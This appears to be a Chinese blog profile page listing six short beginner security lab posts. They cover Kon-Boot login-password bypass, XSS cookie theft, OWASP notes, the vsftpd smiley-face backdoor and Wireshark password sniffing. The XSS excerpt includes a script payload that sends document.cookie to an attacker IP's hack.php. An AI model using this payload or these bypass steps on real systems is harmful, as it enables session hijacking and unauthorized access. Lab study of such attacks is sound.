- 博客(6)
- 收藏
- 关注
原创 Kon-Boot的相关知识
一、Kon-Boot是什么?KON-Boot是一款专门针对Windows、Linux、MAC登陆密码破解工具,他能绕过系统所设有的登陆密码,让你的登陆畅通无阻。二、简述原理KON-Boot的原理是在于处理BIOS修改系统内核的引导处理,跳过SAM的检查,直接登陆系统。三、Kon-Boot制作U盘并进行测试首先插入U盘启动盘的U盘,注意在制作过程中该U盘会被格式化,所以请确保该U盘中的重要文件已备份,然后打开下载好的Kon-Boot,然后右 键以管理员身份打开。当显示your Kon-
2021-11-23 02:50:46 3236
原创 xss漏洞利用
首先,我们先在文件夹找到www命名的文件夹里的html文件夹,在里面创建一个hack.php文件,输入这段代码,然后,再创建一个submit.php文件然后,打开一个浏览器访问 192.168.xx.xxx(你的虚拟机的IP)/submit.php,然后进入到这个界面在这个界面输入"/><script>window.open("http://(填入你的IP)/hack.php?cookie="+document.cookie);</script&...
2021-11-15 19:19:44 1569 3
原创 OWASP Top Ten中的两个
A01:2021中断防问控制从第五位向上移动;94%的应用程序是测试某种形式的断路控制。映射到“中断防问控制”的应用程序中发生的情况比任何其他类别都多。A02:2021-加密故障将一个位置向上移动到#2,以前称为敏感数据暴露,这是广泛的症状,而不是根本的原因。这里重新关注的焦点是与加密相关的故障,这通常会导致敏感数据外展或系统妥协。...
2021-11-15 18:58:51 213
原创 笑脸漏洞复现
首先,我们先ping一下靶机看他是否存活,然后我们对靶机进行nmap操作,进行信息收集然后,我们可以看到它的漏洞,然后用ftp对靶机进行连接然后进行用户名填写:user:)密码随意然后我们再打开一个终端对靶机进行 nc 操作然后我们就可以获得管理员权限了最后,打开终端输入msfconsole然后,这个过程就结束了。...
2021-11-07 21:17:58 143
原创 wireshark抓包明文传输密码账号
首先我们要打开wireshark,选择WLAN,然后开始打开开始捕获数据,进入界面,输入指令http.request.method==POST进行筛选,可以摁红色按钮进行暂停,进入电脑的命令提示符输入ipconfig查找自己的ID,然后登陆一个http(明文传输)的网站,输入账号密码。回到wireshark查看。我们就可以看到了:...
2021-10-15 16:52:26 1464
原创 ping操作传输的是什么报文?
该操作发送了一份ICMP回显请求报文给主机,并等待返回ICMP回显,还可通过该操作去查看ip地址,然后进行一系列的后续操作。
2021-10-11 21:18:02 892
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人